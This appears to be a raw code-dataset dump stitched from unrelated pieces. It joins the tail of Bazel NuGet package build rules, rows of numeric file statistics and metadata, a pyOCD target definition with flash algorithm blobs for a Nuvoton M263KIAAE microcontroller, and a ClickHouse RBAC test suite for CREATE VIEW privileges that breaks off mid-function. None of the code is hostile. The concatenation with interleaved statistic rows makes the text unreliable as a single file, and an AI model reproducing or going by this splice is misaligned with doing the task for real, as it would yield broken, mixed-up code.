"net462": "lib/net46/NuGet.ProjectModel.dll",
"net47": "lib/net46/NuGet.ProjectModel.dll",
"net471": "lib/net46/NuGet.ProjectModel.dll",
"net472": "lib/net46/NuGet.ProjectModel.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.ProjectModel.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.ProjectModel.dll",
},
mono_lib = "lib/net46/NuGet.ProjectModel.dll",
core_deps = {
"net46": [
"@nuget.dependencyresolver.core//:net46_net",
],
"net461": [
"@nuget.dependencyresolver.core//:net461_net",
],
"net462": [
"@nuget.dependencyresolver.core//:net462_net",
],
"net47": [
"@nuget.dependencyresolver.core//:net47_net",
],
"net471": [
"@nuget.dependencyresolver.core//:net471_net",
],
"net472": [
"@nuget.dependencyresolver.core//:net472_net",
],
"netstandard1.6": [
"@nuget.dependencyresolver.core//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.dependencyresolver.core//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.dependencyresolver.core//:net46_net",
],
"net461": [
"@nuget.dependencyresolver.core//:net461_net",
],
"net462": [
"@nuget.dependencyresolver.core//:net462_net",
],
"net47": [
"@nuget.dependencyresolver.core//:net47_net",
],
"net471": [
"@nuget.dependencyresolver.core//:net471_net",
],
"net472": [
"@nuget.dependencyresolver.core//:net472_net",
],
"netstandard1.6": [
"@nuget.dependencyresolver.core//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.dependencyresolver.core//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.dependencyresolver.core//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net461": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net462": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net47": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net471": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"net472": [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.ProjectModel.dll",
"lib/netstandard1.6/NuGet.ProjectModel.xml",
],
},
mono_files = [
"lib/net46/NuGet.ProjectModel.dll",
"lib/net46/NuGet.ProjectModel.xml",
],
)
nuget_package(
name = "nuget.commands",
package = "nuget.commands",
version = "4.8.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.6/NuGet.Commands.dll",
"netcoreapp2.1": "lib/netstandard1.6/NuGet.Commands.dll",
},
net_lib = {
"net46": "lib/net46/NuGet.Commands.dll",
"net461": "lib/net46/NuGet.Commands.dll",
"net462": "lib/net46/NuGet.Commands.dll",
"net47": "lib/net46/NuGet.Commands.dll",
"net471": "lib/net46/NuGet.Commands.dll",
"net472": "lib/net46/NuGet.Commands.dll",
"netstandard1.6": "lib/netstandard1.6/NuGet.Commands.dll",
"netstandard2.0": "lib/netstandard1.6/NuGet.Commands.dll",
},
mono_lib = "lib/net46/NuGet.Commands.dll",
core_deps = {
"net46": [
"@nuget.credentials//:net46_net",
"@nuget.projectmodel//:net46_net",
],
"net461": [
"@nuget.credentials//:net461_net",
"@nuget.projectmodel//:net461_net",
],
"net462": [
"@nuget.credentials//:net462_net",
"@nuget.projectmodel//:net462_net",
],
"net47": [
"@nuget.credentials//:net47_net",
"@nuget.projectmodel//:net47_net",
],
"net471": [
"@nuget.credentials//:net471_net",
"@nuget.projectmodel//:net471_net",
],
"net472": [
"@nuget.credentials//:net472_net",
"@nuget.projectmodel//:net472_net",
],
"netstandard1.6": [
"@nuget.credentials//:netstandard1.6_net",
"@nuget.projectmodel//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.credentials//:netstandard2.0_net",
"@nuget.projectmodel//:netstandard2.0_net",
],
},
net_deps = {
"net46": [
"@nuget.credentials//:net46_net",
"@nuget.projectmodel//:net46_net",
],
"net461": [
"@nuget.credentials//:net461_net",
"@nuget.projectmodel//:net461_net",
],
"net462": [
"@nuget.credentials//:net462_net",
"@nuget.projectmodel//:net462_net",
],
"net47": [
"@nuget.credentials//:net47_net",
"@nuget.projectmodel//:net47_net",
],
"net471": [
"@nuget.credentials//:net471_net",
"@nuget.projectmodel//:net471_net",
],
"net472": [
"@nuget.credentials//:net472_net",
"@nuget.projectmodel//:net472_net",
],
"netstandard1.6": [
"@nuget.credentials//:netstandard1.6_net",
"@nuget.projectmodel//:netstandard1.6_net",
],
"netstandard2.0": [
"@nuget.credentials//:netstandard2.0_net",
"@nuget.projectmodel//:netstandard2.0_net",
],
},
mono_deps = [
"@nuget.credentials//:mono",
"@nuget.projectmodel//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
"netcoreapp2.1": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
},
net_files = {
"net46": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net461": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net462": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net47": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net471": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"net472": [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
"netstandard2.0": [
"lib/netstandard1.6/NuGet.Commands.dll",
"lib/netstandard1.6/NuGet.Commands.xml",
],
},
mono_files = [
"lib/net46/NuGet.Commands.dll",
"lib/net46/NuGet.Commands.xml",
],
)
nuget_package(
name = "microsoft.web.xdt",
package = "microsoft.web.xdt",
version = "2.1.2",
net_lib = {
"net45": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net451": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net452": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net46": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net461": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net462": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net47": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net471": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net472": "lib/net40/Microsoft.Web.XmlTransform.dll",
},
mono_lib = "lib/net40/Microsoft.Web.XmlTransform.dll",
net_files = {
"net45": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net451": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net452": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net46": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net461": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net462": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net47": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net471": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
"net472": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
},
mono_files = [
"lib/net40/Microsoft.Web.XmlTransform.dll",
],
)
nuget_package(
name = "nuget.packagemanagement",
package = "nuget.packagemanagement",
version = "4.8.0",
net_lib = {
"net46": "lib/net46/NuGet.PackageManagement.dll",
"net461": "lib/net46/NuGet.PackageManagement.dll",
"net462": "lib/net46/NuGet.PackageManagement.dll",
"net47": "lib/net46/NuGet.PackageManagement.dll",
"net471": "lib/net46/NuGet.PackageManagement.dll",
"net472": "lib/net46/NuGet.PackageManagement.dll",
},
mono_lib = "lib/net46/NuGet.PackageManagement.dll",
net_deps = {
"net46": [
"@nuget.commands//:net46_net",
"@nuget.resolver//:net46_net",
"@microsoft.web.xdt//:net46_net",
],
"net461": [
"@nuget.commands//:net461_net",
"@nuget.resolver//:net461_net",
"@microsoft.web.xdt//:net461_net",
],
"net462": [
"@nuget.commands//:net462_net",
"@nuget.resolver//:net462_net",
"@microsoft.web.xdt//:net462_net",
],
"net47": [
"@nuget.commands//:net47_net",
"@nuget.resolver//:net47_net",
"@microsoft.web.xdt//:net47_net",
],
"net471": [
"@nuget.commands//:net471_net",
"@nuget.resolver//:net471_net",
"@microsoft.web.xdt//:net471_net",
],
"net472": [
"@nuget.commands//:net472_net",
"@nuget.resolver//:net472_net",
"@microsoft.web.xdt//:net472_net",
],
},
mono_deps = [
"@nuget.commands//:mono",
"@nuget.resolver//:mono",
"@microsoft.web.xdt//:mono",
],
net_files = {
"net46": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net461": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net462": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net47": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net471": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
"net472": [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
},
mono_files = [
"lib/net46/NuGet.PackageManagement.dll",
"lib/net46/NuGet.PackageManagement.xml",
],
)
| 37.642477
| 104
| 0.478453
| 6,624
| 77,807
| 5.505737
| 0.013889
| 0.085001
| 0.102303
| 0.087524
| 0.948231
| 0.923499
| 0.832822
| 0.796764
| 0.714176
| 0.683082
| 0
| 0.072692
| 0.371985
| 77,807
| 2,066
| 105
| 37.660697
| 0.673666
| 0.00126
| 0
| 0.76542
| 0
| 0
| 0.520385
| 0.451586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000486
| true
| 0
| 0
| 0
| 0.000486
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
60aef6c9bf088015bf2201a3e35454c7c14c23bd
| 9,622
|
py
|
Python
|
pyocd/target/builtin/target_M263KIAAE.py
|
vince-zeng/pyOCD
|
c9e7bbaee81c2c94b2d8f05a70b6f341457fdae1
|
[
"Apache-2.0"
] | 1
|
2022-03-25T01:07:23.000Z
|
2022-03-25T01:07:23.000Z
|
pyocd/target/builtin/target_M263KIAAE.py
|
vince-zeng/pyOCD
|
c9e7bbaee81c2c94b2d8f05a70b6f341457fdae1
|
[
"Apache-2.0"
] | null | null | null |
pyocd/target/builtin/target_M263KIAAE.py
|
vince-zeng/pyOCD
|
c9e7bbaee81c2c94b2d8f05a70b6f341457fdae1
|
[
"Apache-2.0"
] | 1
|
2021-06-10T08:34:00.000Z
|
2021-06-10T08:34:00.000Z
|
# pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ...flash.flash import Flash
from ...core.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ...debug.svd.loader import SVDFile
FLASH_ALGO_AP_512 = {
'load_address' : 0x20000000,
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0xb087b5b0, 0x460c4613, 0x90054605, 0x92039104, 0x94019302, 0xe7ff9500, 0x6800481f, 0x42082101,
0xe7ffd001, 0x481de7f8, 0x22406801, 0x60014311, 0x491b9805, 0x98046008, 0x6008491a, 0x28009803,
0xe7ffd105, 0x43c02000, 0x60084917, 0x4816e003, 0x60014916, 0x4816e7ff, 0x60012101, 0x8f6ff3bf,
0x480de7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480a, 0x42082140, 0xe7ffd008, 0x68014807,
0x43112240, 0x20016001, 0xe0029006, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000,
0x4000c00c, 0x4000c004, 0x4000c008, 0x0055aa03, 0x4000c010, 0xb087b5b0, 0x460c4613, 0x90054605,
0x92039104, 0x2159481d, 0x21166001, 0x21886001, 0x68006001, 0x42082101, 0x94019302, 0xd1039500,
0x2001e7ff, 0xe0269006, 0x68014815, 0x43112204, 0x48146001, 0x43116801, 0xe7ff6001, 0x68004812,
0x42082110, 0xe7ffd101, 0x4810e7f8, 0x22016801, 0x60014311, 0x600a490e, 0x42106800, 0xe7ffd103,
0x90062001, 0x4809e007, 0x22406801, 0x60014311, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x40000100,
0x40000200, 0x40000204, 0x40000250, 0x4000c000, 0x4000c01c, 0x4601b082, 0x91009001, 0x4809e7ff,
0x21016800, 0xd0014208, 0xe7f8e7ff, 0x68014806, 0x43912201, 0x48056001, 0x60012100, 0xb0024608,
0x46c04770, 0x4000c0c0, 0x4000c000, 0x4000c01c, 0xb084b580, 0x90034601, 0x22019803, 0x43980713,
0x98039003, 0x40184b0e, 0x98039003, 0x051b230f, 0x05524018, 0x91014290, 0xe7ffd107, 0x49099803,
0x90031840, 0x90022001, 0x2000e002, 0xe7ff9002, 0x9a029903, 0xf7ff2022, 0xb004ff13, 0x46c0bd80,
0xfffff800, 0xffe00000, 0xb086b580, 0x4603460a, 0x91039004, 0x90022000, 0x93009201, 0x9802e7ff,
0x42889903, 0xe7ffd20f, 0x99029804, 0x92021c4a, 0x58400089, 0xffbcf7ff, 0xd0032800, 0x2001e7ff,
0xe0039005, 0x2000e7eb, 0xe7ff9005, 0xb0069805, 0x46c0bd80, 0xb087b5b0, 0x460c4613, 0x90054605,
0x92039104, 0x1cc09804, 0x43882103, 0x98059004, 0x07092101, 0x90054388, 0x94019302, 0xe7ff9500,
0x68004822, 0x42082101, 0xe7ffd001, 0x4820e7f8, 0x22406801, 0x60014311, 0x2121481e, 0xe7ff6001,
0x28009804, 0xe7ffd02c, 0x491b9805, 0x98036008, 0x491a6800, 0x481a6008, 0x60012101, 0x8f6ff3bf,
0x4812e7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480f, 0x42082140, 0xe7ffd008, 0x6801480c,
0x43112240, 0x20016001, 0xe00c9006, 0x1d009805, 0x98039005, 0x90031d00, 0x1f009804, 0xe7cf9004,
0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004, 0x4000c008,
0x4000c010, 0xb088b5b0, 0x460c4613, 0x90064605, 0x92049105, 0x1cc09805, 0x43882103, 0x98069005,
0x07092101, 0x90034008, 0x43889806, 0x93029006, 0x95009401, 0x4826e7ff, 0x21016800, 0xd0014208,
0xe7f8e7ff, 0x68014823, 0x43112240, 0x48226001, 0x60012100, 0x9805e7ff, 0xd0322800, 0x9806e7ff,
0x6008491e, 0x2101481e, 0xf3bf6001, 0xe7ff8f6f, 0x68004817, 0x42082101, 0xe7ffd001, 0x4815e7f8,
0x21406800, 0xd0084208, 0x4812e7ff, 0x22406801, 0x60014311, 0x90072001, 0x4812e016, 0x99046800,
0x42886809, 0xe7ffd003, 0x90072001, 0x9806e00c, 0x90061d00, 0x1d009804, 0x98059004, 0x90051f00,
0x2000e7c9, 0xe7ff9007, 0xb0089807, 0x46c0bdb0, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004,
0x4000c010, 0x4000c008, 0x00000000
],
# Relative function addresses
'pc_init': 0x200000d5,
'pc_unInit': 0x20000175,
'pc_program_page': 0x20000255,
'pc_erase_sector': 0x200001b1,
'pc_eraseAll': 0x0,
'static_base' : 0x20000000 + 0x00000020 + 0x000003e8,
'begin_stack' : 0x20000700,
'begin_data' : 0x20000000 + 0x1000,
'page_size' : 0x800,
'analyzer_supported' : False,
'analyzer_address' : 0x00000000,
'page_buffers' : [0x20001000, 0x20001800], # Enable double buffering
'min_program_length' : 0x800,
# Flash information
'flash_start': 0x0,
'flash_size': 0x80000,
'sector_sizes': (
(0x0, 0x800),
)
}
FLASH_ALGO_LD_4 = {
'load_address' : 0x20000000,
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0xb087b5b0, 0x460c4613, 0x90054605, 0x92039104, 0x94019302, 0xe7ff9500, 0x6800481f, 0x42082101,
0xe7ffd001, 0x481de7f8, 0x22406801, 0x60014311, 0x491b9805, 0x98046008, 0x6008491a, 0x28009803,
0xe7ffd105, 0x43c02000, 0x60084917, 0x4816e003, 0x60014916, 0x4816e7ff, 0x60012101, 0x8f6ff3bf,
0x480de7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480a, 0x42082140, 0xe7ffd008, 0x68014807,
0x43112240, 0x20016001, 0xe0029006, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000,
0x4000c00c, 0x4000c004, 0x4000c008, 0x0055aa03, 0x4000c010, 0xb087b5b0, 0x460c4613, 0x90054605,
0x92039104, 0x2159481d, 0x21166001, 0x21886001, 0x68006001, 0x42082101, 0x94019302, 0xd1039500,
0x2001e7ff, 0xe0269006, 0x68014815, 0x43112204, 0x48146001, 0x43116801, 0xe7ff6001, 0x68004812,
0x42082110, 0xe7ffd101, 0x4810e7f8, 0x22016801, 0x60014311, 0x600a490e, 0x42106800, 0xe7ffd103,
0x90062001, 0x4809e007, 0x22406801, 0x60014311, 0x90062000, 0x9806e7ff, 0xbdb0b007, 0x40000100,
0x40000200, 0x40000204, 0x40000250, 0x4000c000, 0x4000c01c, 0x4601b082, 0x91009001, 0x4809e7ff,
0x21016800, 0xd0014208, 0xe7f8e7ff, 0x68014806, 0x43912201, 0x48056001, 0x60012100, 0xb0024608,
0x46c04770, 0x4000c0c0, 0x4000c000, 0x4000c01c, 0xb084b580, 0x90034601, 0x22019803, 0x43980713,
0x98039003, 0x40184b0e, 0x98039003, 0x051b230f, 0x05524018, 0x91014290, 0xe7ffd107, 0x49099803,
0x90031840, 0x90022001, 0x2000e002, 0xe7ff9002, 0x9a029903, 0xf7ff2022, 0xb004ff13, 0x46c0bd80,
0xfffff800, 0xffe00000, 0xb086b580, 0x4603460a, 0x91039004, 0x90022000, 0x93009201, 0x9802e7ff,
0x42889903, 0xe7ffd20f, 0x99029804, 0x92021c4a, 0x58400089, 0xffbcf7ff, 0xd0032800, 0x2001e7ff,
0xe0039005, 0x2000e7eb, 0xe7ff9005, 0xb0069805, 0x46c0bd80, 0xb087b5b0, 0x460c4613, 0x90054605,
0x92039104, 0x1cc09804, 0x43882103, 0x98059004, 0x07092101, 0x90054388, 0x94019302, 0xe7ff9500,
0x68004822, 0x42082101, 0xe7ffd001, 0x4820e7f8, 0x22406801, 0x60014311, 0x2121481e, 0xe7ff6001,
0x28009804, 0xe7ffd02c, 0x491b9805, 0x98036008, 0x491a6800, 0x481a6008, 0x60012101, 0x8f6ff3bf,
0x4812e7ff, 0x21016800, 0xd0014208, 0xe7f8e7ff, 0x6800480f, 0x42082140, 0xe7ffd008, 0x6801480c,
0x43112240, 0x20016001, 0xe00c9006, 0x1d009805, 0x98039005, 0x90031d00, 0x1f009804, 0xe7cf9004,
0x90062000, 0x9806e7ff, 0xbdb0b007, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004, 0x4000c008,
0x4000c010, 0xb088b5b0, 0x460c4613, 0x90064605, 0x92049105, 0x1cc09805, 0x43882103, 0x98069005,
0x07092101, 0x90034008, 0x43889806, 0x93029006, 0x95009401, 0x4826e7ff, 0x21016800, 0xd0014208,
0xe7f8e7ff, 0x68014823, 0x43112240, 0x48226001, 0x60012100, 0x9805e7ff, 0xd0322800, 0x9806e7ff,
0x6008491e, 0x2101481e, 0xf3bf6001, 0xe7ff8f6f, 0x68004817, 0x42082101, 0xe7ffd001, 0x4815e7f8,
0x21406800, 0xd0084208, 0x4812e7ff, 0x22406801, 0x60014311, 0x90072001, 0x4812e016, 0x99046800,
0x42886809, 0xe7ffd003, 0x90072001, 0x9806e00c, 0x90061d00, 0x1d009804, 0x98059004, 0x90051f00,
0x2000e7c9, 0xe7ff9007, 0xb0089807, 0x46c0bdb0, 0x4000c0c0, 0x4000c000, 0x4000c00c, 0x4000c004,
0x4000c010, 0x4000c008, 0x00000000
],
# Relative function addresses
'pc_init': 0x200000d5,
'pc_unInit': 0x20000175,
'pc_program_page': 0x20000255,
'pc_erase_sector': 0x200001b1,
'pc_eraseAll': 0x0,
'static_base' : 0x20000000 + 0x00000020 + 0x000003e8,
'begin_stack' : 0x20000700,
'begin_data' : 0x20000000 + 0x1000,
'page_size' : 0x800,
'analyzer_supported' : False,
'analyzer_address' : 0x00000000,
'page_buffers' : [0x20001000, 0x20001800], # Enable double buffering
'min_program_length' : 0x800,
# Flash information
'flash_start': 0x100000,
'flash_size': 0x1000,
'sector_sizes': (
(0x0, 0x800),
)
}
class M263KIAAE(CoreSightTarget):
VENDOR = "Nuvoton"
memoryMap = MemoryMap(
FlashRegion( start=0x00000000, length=0x80000, sector_size=0x0800,
page_size=0x0800,
is_boot_memory=True,
algo=FLASH_ALGO_AP_512),
FlashRegion( start=0x00100000, length=0x1000, sector_size=0x0800,
page_size=0x0800,
algo=FLASH_ALGO_LD_4),
RamRegion( start=0x20000000, length=0x18000)
)
def __init__(self, link):
super(M263KIAAE, self).__init__(link, self.memoryMap)
self._svd_location = SVDFile.from_builtin("M261_v1.svd")
| 59.030675
| 99
| 0.744336
| 854
| 9,622
| 8.302108
| 0.395785
| 0.022567
| 0.03385
| 0.03385
| 0.850494
| 0.850494
| 0.842031
| 0.842031
| 0.842031
| 0.842031
| 0
| 0.546388
| 0.169923
| 9,622
| 162
| 100
| 59.395062
| 0.341305
| 0.077219
| 0
| 0.793893
| 0
| 0
| 0.051485
| 0
| 0
| 0
| 0.631365
| 0
| 0
| 1
| 0.007634
| false
| 0
| 0.030534
| 0
| 0.061069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
60b006324cff30289f01c8333639af9249888759
| 60,333
|
py
|
Python
|
tests/testflows/rbac/tests/views/view.py
|
mikhno-s/ClickHouse
|
83e95cd0120da00a60506fcf2f4d23d908c45977
|
[
"Apache-2.0"
] | 2
|
2021-03-25T06:53:00.000Z
|
2021-04-29T07:32:51.000Z
|
tests/testflows/rbac/tests/views/view.py
|
mikhno-s/ClickHouse
|
83e95cd0120da00a60506fcf2f4d23d908c45977
|
[
"Apache-2.0"
] | 1
|
2020-03-26T01:50:51.000Z
|
2020-03-26T01:50:51.000Z
|
tests/testflows/rbac/tests/views/view.py
|
mikhno-s/ClickHouse
|
83e95cd0120da00a60506fcf2f4d23d908c45977
|
[
"Apache-2.0"
] | null | null | null |
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_View_Create("1.0"),
)
def create(self, node=None):
"""Test the RBAC functionality of the `CREATE VIEW` command.
"""
Scenario(run=create_without_create_view_privilege)
Scenario(run=create_with_create_view_privilege_granted_directly_or_via_role)
Scenario(run=create_with_revoked_create_view_privilege_revoked_directly_or_from_role)
Scenario(run=create_without_source_table_privilege)
Scenario(run=create_with_source_table_privilege_granted_directly_or_via_role)
Scenario(run=create_with_subquery_privilege_granted_directly_or_via_role)
Scenario(run=create_with_join_query_privilege_granted_directly_or_via_role)
Scenario(run=create_with_union_query_privilege_granted_directly_or_via_role)
Scenario(run=create_with_join_union_subquery_privilege_granted_directly_or_via_role)
Scenario(run=create_with_nested_views_privilege_granted_directly_or_via_role)
@TestScenario
def create_without_create_view_privilege(self, node=None):
"""Check that user is unable to create a view without CREATE VIEW privilege.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
with When("I try to create a view without CREATE VIEW privilege as the user"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1", settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
@TestScenario
def create_with_create_view_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view with CREATE VIEW privilege, either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_create_view_privilege,
name="create with create view privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_create_view_privilege,
name="create with create view privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_create_view_privilege(self, grant_target_name, user_name, node=None):
"""Check that user is able to create a view with the granted privileges.
"""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with When("I grant the CREATE VIEW privilege"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I try to create a view without privilege as the user"):
node.query(f"CREATE VIEW {view_name} AS SELECT 1", settings = [("user", f"{user_name}")])
finally:
with Then("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_revoked_create_view_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to create view after the CREATE VIEW privilege is revoked, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_revoked_create_view_privilege,
name="create with create view privilege revoked directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_revoked_create_view_privilege,
name="create with create view privilege revoked from a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_revoked_create_view_privilege(self, grant_target_name, user_name, node=None):
"""Revoke CREATE VIEW privilege and check the user is unable to create a view.
"""
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with And("I revoke CREATE VIEW privilege"):
node.query(f"REVOKE CREATE VIEW ON {view_name} FROM {grant_target_name}")
with Then("I try to create a view on the table as the user"):
node.query(f"CREATE VIEW {view_name} AS SELECT 1", settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
@TestScenario
def create_without_source_table_privilege(self, node=None):
"""Check that user is unable to create a view without select
privilege on the source table.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
with user(node, f"{user_name}"):
with When("I grant CREATE VIEW privilege to a user"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {user_name}")
with Then("I try to create a view without select privilege on the table"):
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}", settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
@TestScenario
def create_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that a user is able to create a view if and only if the user has create view privilege and
select privilege on the source table, either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_source_table_privilege,
name="create with create view and select privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_source_table_privilege,
name="create with create view and select privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_source_table_privilege(self, user_name, grant_target_name, node=None):
"""Check that user is unable to create a view without SELECT privilege on the source table.
"""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
